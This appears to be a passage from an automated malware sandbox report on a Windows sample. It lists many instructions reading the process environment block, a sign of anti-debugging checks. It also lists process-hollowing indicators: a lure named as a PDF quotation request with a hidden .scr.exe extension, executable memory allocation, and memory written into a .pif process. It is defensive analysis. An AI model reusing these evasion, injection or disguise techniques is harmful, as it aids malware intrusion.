                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C8F9 mov eax, dword ptr fs:[00000030h]6_2_2CE0C8F9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE8C0 mov eax, dword ptr fs:[00000030h]6_2_2CDFE8C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0887 mov eax, dword ptr fs:[00000030h]6_2_2CDD0887
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C89D mov eax, dword ptr fs:[00000030h]6_2_2CE5C89D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD4859 mov eax, dword ptr fs:[00000030h]6_2_2CDD4859
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD4859 mov eax, dword ptr fs:[00000030h]6_2_2CDD4859
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66870 mov eax, dword ptr fs:[00000030h]6_2_2CE66870
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66870 mov eax, dword ptr fs:[00000030h]6_2_2CE66870
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5E872 mov eax, dword ptr fs:[00000030h]6_2_2CE5E872
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5E872 mov eax, dword ptr fs:[00000030h]6_2_2CE5E872
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE2840 mov ecx, dword ptr fs:[00000030h]6_2_2CDE2840
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE00854 mov eax, dword ptr fs:[00000030h]6_2_2CE00854
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A830 mov eax, dword ptr fs:[00000030h]6_2_2CE0A830
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7483A mov eax, dword ptr fs:[00000030h]6_2_2CE7483A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7483A mov eax, dword ptr fs:[00000030h]6_2_2CE7483A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov ecx, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2835 mov eax, dword ptr fs:[00000030h]6_2_2CDF2835
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C810 mov eax, dword ptr fs:[00000030h]6_2_2CE5C810
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5E9E0 mov eax, dword ptr fs:[00000030h]6_2_2CE5E9E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDA9D0 mov eax, dword ptr fs:[00000030h]6_2_2CDDA9D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE029F9 mov eax, dword ptr fs:[00000030h]6_2_2CE029F9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE029F9 mov eax, dword ptr fs:[00000030h]6_2_2CE029F9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE669C0 mov eax, dword ptr fs:[00000030h]6_2_2CE669C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE049D0 mov eax, dword ptr fs:[00000030h]6_2_2CE049D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9A9D3 mov eax, dword ptr fs:[00000030h]6_2_2CE9A9D3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE589B3 mov esi, dword ptr fs:[00000030h]6_2_2CE589B3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE589B3 mov eax, dword ptr fs:[00000030h]6_2_2CE589B3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE589B3 mov eax, dword ptr fs:[00000030h]6_2_2CE589B3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD09AD mov eax, dword ptr fs:[00000030h]6_2_2CDD09AD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD09AD mov eax, dword ptr fs:[00000030h]6_2_2CDD09AD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A0 mov eax, dword ptr fs:[00000030h]6_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1096E mov eax, dword ptr fs:[00000030h]6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1096E mov edx, dword ptr fs:[00000030h]6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1096E mov eax, dword ptr fs:[00000030h]6_2_2CE1096E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C97C mov eax, dword ptr fs:[00000030h]6_2_2CE5C97C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74978 mov eax, dword ptr fs:[00000030h]6_2_2CE74978
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE74978 mov eax, dword ptr fs:[00000030h]6_2_2CE74978
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE50946 mov eax, dword ptr fs:[00000030h]6_2_2CE50946
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF6962 mov eax, dword ptr fs:[00000030h]6_2_2CDF6962
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF6962 mov eax, dword ptr fs:[00000030h]6_2_2CDF6962
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF6962 mov eax, dword ptr fs:[00000030h]6_2_2CDF6962
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC8918 mov eax, dword ptr fs:[00000030h]6_2_2CDC8918
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC8918 mov eax, dword ptr fs:[00000030h]6_2_2CDC8918
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE6892B mov eax, dword ptr fs:[00000030h]6_2_2CE6892B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5892A mov eax, dword ptr fs:[00000030h]6_2_2CE5892A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E908 mov eax, dword ptr fs:[00000030h]6_2_2CE4E908
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E908 mov eax, dword ptr fs:[00000030h]6_2_2CE4E908
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C912 mov eax, dword ptr fs:[00000030h]6_2_2CE5C912
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0AD0 mov eax, dword ptr fs:[00000030h]6_2_2CDD0AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0AAEE mov eax, dword ptr fs:[00000030h]6_2_2CE0AAEE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0AAEE mov eax, dword ptr fs:[00000030h]6_2_2CE0AAEE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE26ACC mov eax, dword ptr fs:[00000030h]6_2_2CE26ACC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE26ACC mov eax, dword ptr fs:[00000030h]6_2_2CE26ACC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE26ACC mov eax, dword ptr fs:[00000030h]6_2_2CE26ACC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE04AD0 mov eax, dword ptr fs:[00000030h]6_2_2CE04AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE04AD0 mov eax, dword ptr fs:[00000030h]6_2_2CE04AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE26AA4 mov eax, dword ptr fs:[00000030h]6_2_2CE26AA4
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA80 mov eax, dword ptr fs:[00000030h]6_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4A80 mov eax, dword ptr fs:[00000030h]6_2_2CEA4A80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08A90 mov edx, dword ptr fs:[00000030h]6_2_2CE08A90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8AA0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8AA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8AA0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8AA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0A5B mov eax, dword ptr fs:[00000030h]6_2_2CDE0A5B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0A5B mov eax, dword ptr fs:[00000030h]6_2_2CDE0A5B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7EA60 mov eax, dword ptr fs:[00000030h]6_2_2CE7EA60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD6A50 mov eax, dword ptr fs:[00000030h]6_2_2CDD6A50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA6F mov eax, dword ptr fs:[00000030h]6_2_2CE0CA6F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA6F mov eax, dword ptr fs:[00000030h]6_2_2CE0CA6F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA6F mov eax, dword ptr fs:[00000030h]6_2_2CE0CA6F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4CA72 mov eax, dword ptr fs:[00000030h]6_2_2CE4CA72
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4CA72 mov eax, dword ptr fs:[00000030h]6_2_2CE4CA72
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA24 mov eax, dword ptr fs:[00000030h]6_2_2CE0CA24
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0CA38 mov eax, dword ptr fs:[00000030h]6_2_2CE0CA38
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF4A35 mov eax, dword ptr fs:[00000030h]6_2_2CDF4A35
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF4A35 mov eax, dword ptr fs:[00000030h]6_2_2CDF4A35
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEA2E mov eax, dword ptr fs:[00000030h]6_2_2CDFEA2E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5CA11 mov eax, dword ptr fs:[00000030h]6_2_2CE5CA11
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0BCD mov eax, dword ptr fs:[00000030h]6_2_2CDD0BCD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0BCD mov eax, dword ptr fs:[00000030h]6_2_2CDD0BCD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0BCD mov eax, dword ptr fs:[00000030h]6_2_2CDD0BCD
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF0BCB mov eax, dword ptr fs:[00000030h]6_2_2CDF0BCB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF0BCB mov eax, dword ptr fs:[00000030h]6_2_2CDF0BCB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF0BCB mov eax, dword ptr fs:[00000030h]6_2_2CDF0BCB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5CBF0 mov eax, dword ptr fs:[00000030h]6_2_2CE5CBF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEBFC mov eax, dword ptr fs:[00000030h]6_2_2CDFEBFC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8BF0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8BF0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8BF0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7EBD0 mov eax, dword ptr fs:[00000030h]6_2_2CE7EBD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE84BB0 mov eax, dword ptr fs:[00000030h]6_2_2CE84BB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE84BB0 mov eax, dword ptr fs:[00000030h]6_2_2CE84BB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0BBE mov eax, dword ptr fs:[00000030h]6_2_2CDE0BBE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0BBE mov eax, dword ptr fs:[00000030h]6_2_2CDE0BBE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCB7E mov eax, dword ptr fs:[00000030h]6_2_2CDCCB7E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE84B4B mov eax, dword ptr fs:[00000030h]6_2_2CE84B4B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE84B4B mov eax, dword ptr fs:[00000030h]6_2_2CE84B4B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE78B42 mov eax, dword ptr fs:[00000030h]6_2_2CE78B42
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66B40 mov eax, dword ptr fs:[00000030h]6_2_2CE66B40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66B40 mov eax, dword ptr fs:[00000030h]6_2_2CE66B40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9AB40 mov eax, dword ptr fs:[00000030h]6_2_2CE9AB40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7EB50 mov eax, dword ptr fs:[00000030h]6_2_2CE7EB50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE98B28 mov eax, dword ptr fs:[00000030h]6_2_2CE98B28
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE98B28 mov eax, dword ptr fs:[00000030h]6_2_2CE98B28
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEB20 mov eax, dword ptr fs:[00000030h]6_2_2CDFEB20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEB20 mov eax, dword ptr fs:[00000030h]6_2_2CDFEB20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD04E5 mov ecx, dword ptr fs:[00000030h]6_2_2CDD04E5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE044B0 mov ecx, dword ptr fs:[00000030h]6_2_2CE044B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5A4B0 mov eax, dword ptr fs:[00000030h]6_2_2CE5A4B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD64AB mov eax, dword ptr fs:[00000030h]6_2_2CDD64AB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC645D mov eax, dword ptr fs:[00000030h]6_2_2CDC645D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF245A mov eax, dword ptr fs:[00000030h]6_2_2CDF245A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C460 mov ecx, dword ptr fs:[00000030h]6_2_2CE5C460
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFA470 mov eax, dword ptr fs:[00000030h]6_2_2CDFA470
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFA470 mov eax, dword ptr fs:[00000030h]6_2_2CDFA470
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFA470 mov eax, dword ptr fs:[00000030h]6_2_2CDFA470
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A430 mov eax, dword ptr fs:[00000030h]6_2_2CE0A430
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08402 mov eax, dword ptr fs:[00000030h]6_2_2CE08402
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08402 mov eax, dword ptr fs:[00000030h]6_2_2CE08402
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08402 mov eax, dword ptr fs:[00000030h]6_2_2CE08402
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCC427 mov eax, dword ptr fs:[00000030h]6_2_2CDCC427
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCE420 mov eax, dword ptr fs:[00000030h]6_2_2CDCE420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCE420 mov eax, dword ptr fs:[00000030h]6_2_2CDCE420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCE420 mov eax, dword ptr fs:[00000030h]6_2_2CDCE420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD65D0 mov eax, dword ptr fs:[00000030h]6_2_2CDD65D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C5ED mov eax, dword ptr fs:[00000030h]6_2_2CE0C5ED
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C5ED mov eax, dword ptr fs:[00000030h]6_2_2CE0C5ED

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory allocated: C:\Users\Public\Libraries\kmtqwssC.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory allocated: C:\Users\Public\Libraries\kmtqwssC.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif Section loaded: NULL target: C:\Users\Public\Libraries\Csswqtmk.PIF protection: execute and read and write
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Section unmapped: C:\Users\Public\Libraries\kmtqwssC.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Section unmapped: C:\Users\Public\Libraries\kmtqwssC.pif base address: 400000
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Memory written: C:\Users\Public\Libraries\kmtqwssC.pif base: 2AA008
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory written: C:\Users\Public\Libraries\kmtqwssC.pif base: 3DF008
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Memory written: C:\Users\Public\Libraries\kmtqwssC.pif base: 29B008
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe Process created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pif
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIF Process created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pif
